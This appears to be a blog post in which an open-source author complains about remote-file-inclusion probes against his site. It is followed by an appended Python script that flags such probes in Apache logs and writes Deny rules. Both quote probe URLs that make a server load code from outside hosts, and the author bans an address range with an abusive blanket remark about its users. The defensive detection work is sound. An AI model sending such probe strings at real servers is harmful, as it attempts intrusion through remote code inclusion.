Open source software security

Asshole Hackers

30 November -0001

So I started up logging on this site the other day, mostly out of curiosity. I was completely disheartened as soon as I did though. Come to find out some of the most common hits on the site are by people looking to exploit a basedir file inclusion vulnerability. What's worse, this is a vulnerability that exists in some of the software I've written and released open source. In any case, these assholes are basically trying to break into my server by exploiting this vulnerability.

What pisses me off most about this is that I'm the freakin' author of the software that was vulnerable - and I'm the one who wrote the patch. Who are these people? They're blindly trying the exploit against other software that doesn't even have the same code base. For instance:

Type	page not found
Date	Thursday, July 19, 2007 - 10:00
User	Anonymous
Location	http://justin.madirish.net/?q=taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1??
Referrer	
Message	taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1??
Severity	warning
Hostname	163.23.78.1

Who is 163.23.78.1? Well, let's do some checking and find out. ARIN reports that this is someone in APNIC. I fucking hate people on APNIC. They're responsible for like 90% of the spam I get and now they're trying to hack my servers. Well guess what assholes? I'm dropping the entire APNIC range (163.13.0.0 - 163.32.255.255) into a blacklist so my server doesn't respond to your requests.

This might be a little overkill in terms of response, but frankly the information on my site is totally free. I don't get anything out of sharing it, and this sort of crap makes me want to yank the whole thing. Anywhoo, for now I'm dropping a couple extra lines into httpd.conf:

Deny from 163.23
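As an added example (not code from the original post or from the author's software), here is a small Python script that scans Apache access-log lines for the pattern behind the watchdog entry above: a query parameter whose value is itself a remote URL, which is what a basedir file-inclusion probe looks like. The log lines are constructed samples; the first one mirrors the request quoted in the post, the other client addresses are documentation-range placeholders. It also turns the findings into per-host Deny directives for httpd.conf.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: client IP first, request line in quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*"')

# A parameter value that is itself a URL is the hallmark of a remote-file-
# inclusion probe such as ?GLOBALS[basedir]=http://somewhere/1
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def remote_include_params(target):
    """Return (name, value) pairs in the request target whose value is a remote URL.

    The query is split on both '&' and '?' so that nested queries like Drupal's
    ?q=path.php?GLOBALS[basedir]=http://... are still taken apart.
    """
    if "?" not in target:
        return []
    query = unquote(target.split("?", 1)[1])  # decode %-escapes before splitting
    hits = []
    for fragment in re.split(r"[?&]", query):
        if "=" not in fragment:
            continue
        name, value = fragment.split("=", 1)
        if REMOTE_RE.match(value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return (client_ip, param_name, remote_url) for every probe found in the log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in remote_include_params(m.group("target")):
            findings.append((m.group("ip"), name, value))
    return findings


def deny_directives(findings):
    """One Apache 'Deny from' line per offending client address."""
    return ["Deny from " + ip for ip in sorted({ip for ip, _, _ in findings})]


# Constructed sample log lines; the first mirrors the probe quoted in the post.
SAMPLE_LOG = [
    '163.23.78.1 - - [19/Jul/2007:10:00:00 -0400] "GET /?q=taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1?? HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [19/Jul/2007:10:01:13 -0400] "GET /?q=node/12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [19/Jul/2007:10:02:41 -0400] "GET /addressbook.php?basedir=http%3A%2F%2F192.0.2.10%2Finc.txt%3F HTTP/1.0" 404 512 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("probe from %s: %s=%s" % hit)
    print("\n".join(deny_directives(scan_log(SAMPLE_LOG))))
```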